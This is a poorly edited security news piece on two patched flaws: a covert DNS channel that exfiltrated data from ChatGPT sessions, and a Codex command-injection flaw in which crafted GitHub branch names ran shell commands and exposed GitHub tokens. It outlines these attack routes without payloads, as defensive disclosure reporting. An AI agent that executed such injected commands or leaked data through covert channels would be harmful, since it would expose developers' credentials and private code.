Critical Flaw discovered by OpenAI’s coding agent that exposed the GitHub login credentials of developers tool. i.e. Codex. This raiseed serious security concern’s regarding enterprise security as the flaw allowed attackers to access their private code repositories without authorization. BeyondTrust Phantom Labs researchers found patched Codex flaw that passed text from outside its system directly into its own operating system commands .
OpenAI has patched two significant security vulnerabilities affecting its widely used artificial intelligence platforms, ChatGPT and Codex, following responsible disclosures from cybersecurity researchers.
The first vulnerability: ChatGPT exposed as hidden data exfiltration channel discovered
This has been identified by Check Point researchers, exposed a novel method for silently extracting sensitive user data from ChatGPT sessions without user awareness.
The attackers leveraged a DNS-based covert communication mechanism. By encoding data into DNS queries, attackers could transmit information externally without triggering security warnings or requiring user consent.
The flaw allows attackers to embed harmful logic directly into these custom configurations—turning them into persistent, stealthy attack vectors.
An attacker who could edit a shared code repository and embed hidden instructions in a text label used to organize different versions of the code.
The second vulnerability is in Codex Enabled GitHub Token Theft
BeyondTrust Phantom Labs researchers found patched Codex flaw that passed text from outside its system directly into its own operating system commands .
The vulnerability also affected Codex’s code review feature. When a developer tags Codex in a GitHub code review, it launches a separate process to analyze the code.
The researchers said that this process was vulnerable to the same attack and that exploiting it could yield a credential with access across an entire organization’s repositories, not just a single user’s account.
Issue addressed by OpenAI
Open AI classified the vulnerability as critical, and issued an initial fix a week after its disclosure, followed by a second, more comprehensive fix a month later. Open AI patched with stronger input validation, shell escaping and token control.
Exploiting Developers Workflow & creating blind spots
Once attackers gained access to a shared repository, they could designate the compromised label as the default, exposing every developer working on that project. Such vulnerabilities create “blind spots” in AI systems, where neither users nor the platform can easily detect misuse or misconfigurations.
As per experts such incidents highlight systemic risks as AI systems evolve into full-scale computing environments.
How a developer can be affected by such blind spots in AI systems
Developers workflow can be thoroughly exploited as per experts if the following happens
This creates a highly scalable attack vector, particularly in collaborative or open-source environments.
As per researchers the problem started from the way codex processes branch names during task creation and any changes in GitHub project developers conduct, they do in distinct or discreate way creating a separate branch.
Now an attacker can manipulate the branch parameter to inject arbitrary shell commands while setting up the environment. And these commands have the ability to run any code including malicious ones.
AI Coding Agents
AI coding agents are place for live execution environments and having access to sensitive credentials and organizational resources makes them more vulnerable. AI Agents are now growingly integrated into developers workflow and the security aspects must be treated with equal importance as any other application security.
Sources: OpenAI Codex Vulnerability Exposes GitHub Tokens—A Developer’s Nightmare | AI News
Recent Comments